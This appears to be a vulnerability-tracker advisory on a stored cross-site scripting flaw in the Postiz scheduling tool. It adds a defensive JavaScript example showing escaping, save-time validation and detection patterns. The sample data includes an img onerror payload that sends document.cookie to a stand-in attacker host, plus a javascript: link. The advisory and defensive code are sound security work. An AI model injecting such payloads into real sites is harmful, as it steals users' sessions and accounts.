Postiz Stored Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting vulnerability has been identified in Postiz, an AI social media scheduling tool, in version 2.21.6, prior to the fix in 2.21.7. Any authenticated user who can create a post can inject arbitrary HTML into the post content by modifying the save request for their own post; the submitted content is stored as-is. The stored HTML is later rendered in the post's public preview link via dangerouslySetInnerHTML, on the main application origin, so any script it carries executes with the origin and session privileges of whoever opens the preview. An attacker can therefore use the preview feature to persistently compromise other users of the instance.

Impact

An authenticated user can store malicious HTML that later executes in the browsers of other users who open the preview link, in the context of the application origin. According to the advisory, this can be used to gain full admin permissions on a team, remove all of the team's posts and integrations, and read the victim's API token for persistent access to their account.

Remediation

Users are advised to upgrade to Postiz version 2.21.7 or later. Because the payload is stored rather than reflected, operators should also review posts created before the upgrade for injected markup, and rotate the API tokens of any user who may have opened a malicious preview while the vulnerable version was deployed.
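The following is an added illustration, not Postiz source code, of the pattern the Vulnerability section describes and of the post-upgrade review recommended above. It models the preview as a function that splices stored content into markup (the equivalent of dangerouslySetInnerHTML), shows the escaped rendering that neutralises it, adds a server-side check for the save request, and scans a constructed set of stored posts for indicators of injected HTML. The post records, field names and the attacker URL are hypothetical.

```javascript
// Added example, not Postiz code. Models the advisory's pattern: post content
// stored verbatim from the save request, later rendered as raw HTML in a
// public preview on the application origin.

// Constructed sample of stored posts, as a client could have submitted them
// by editing the save request body (record shape and values are hypothetical).
const STORED_POSTS = [
  { id: 1, author: "alice", content: "Launching our new feature on Monday!" },
  { id: 2, author: "mallory",
    content: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
  { id: 3, author: "bob", content: "Use 1 < 2 && 3 > 2 in the caption" },
  { id: 4, author: "mallory", content: '<a href="javascript:alert(1)">click</a>' },
];

// Vulnerable preview: raw content is spliced into the page markup, so any tag a
// user stored runs on the application origin for whoever opens the link.
function renderPreviewUnsafe(post) {
  return `<div class="preview">${post.content}</div>`;
}

// Escape the five characters that can change HTML structure.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened preview: content is rendered as text. In React this is the default
// `{post.content}` child rather than dangerouslySetInnerHTML.
function renderPreviewSafe(post) {
  return `<div class="preview">${escapeHtml(post.content)}</div>`;
}

// Server-side gate for the save request: a scheduling caption is plain text, so
// reject tag-like tokens outright instead of trying to sanitise rich HTML.
// Bare "<" or ">" followed by a space (as in "1 < 2") is still accepted.
const MARKUP = /<\/?[a-z][^>]*>/i;
function validateContentOnSave(content) {
  if (MARKUP.test(content)) {
    return { ok: false, reason: "HTML markup is not allowed in post content" };
  }
  return { ok: true };
}

// Post-upgrade triage: scan existing posts for payloads stored before the fix.
const INDICATORS = [
  { name: "html-tag", re: MARKUP },
  { name: "event-handler", re: /\son[a-z]+\s*=/i },
  { name: "script-uri", re: /javascript:/i },
];
function findSuspiciousPosts(posts) {
  return posts.flatMap((p) => {
    const hits = INDICATORS.filter((i) => i.re.test(p.content)).map((i) => i.name);
    return hits.length ? [{ id: p.id, author: p.author, indicators: hits }] : [];
  });
}

// Stand-alone run: list the posts an operator should inspect after upgrading.
console.log(JSON.stringify(findSuspiciousPosts(STORED_POSTS), null, 2));
```

The escaping in renderPreviewSafe is the fix for the render side and works regardless of what is already in the database; the save-time check closes the input side so the stored data stays clean. If the product later wants genuinely rich text in posts, the right replacement for the reject rule is an allowlist-based HTML sanitiser applied at render time, not a blocklist of dangerous strings.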

Added: May 8, 2026, 11:21 PM
Updated: May 8, 2026, 11:21 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 1.7
exploitability: 6.2
remediation: 0.0
relevance: 7.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.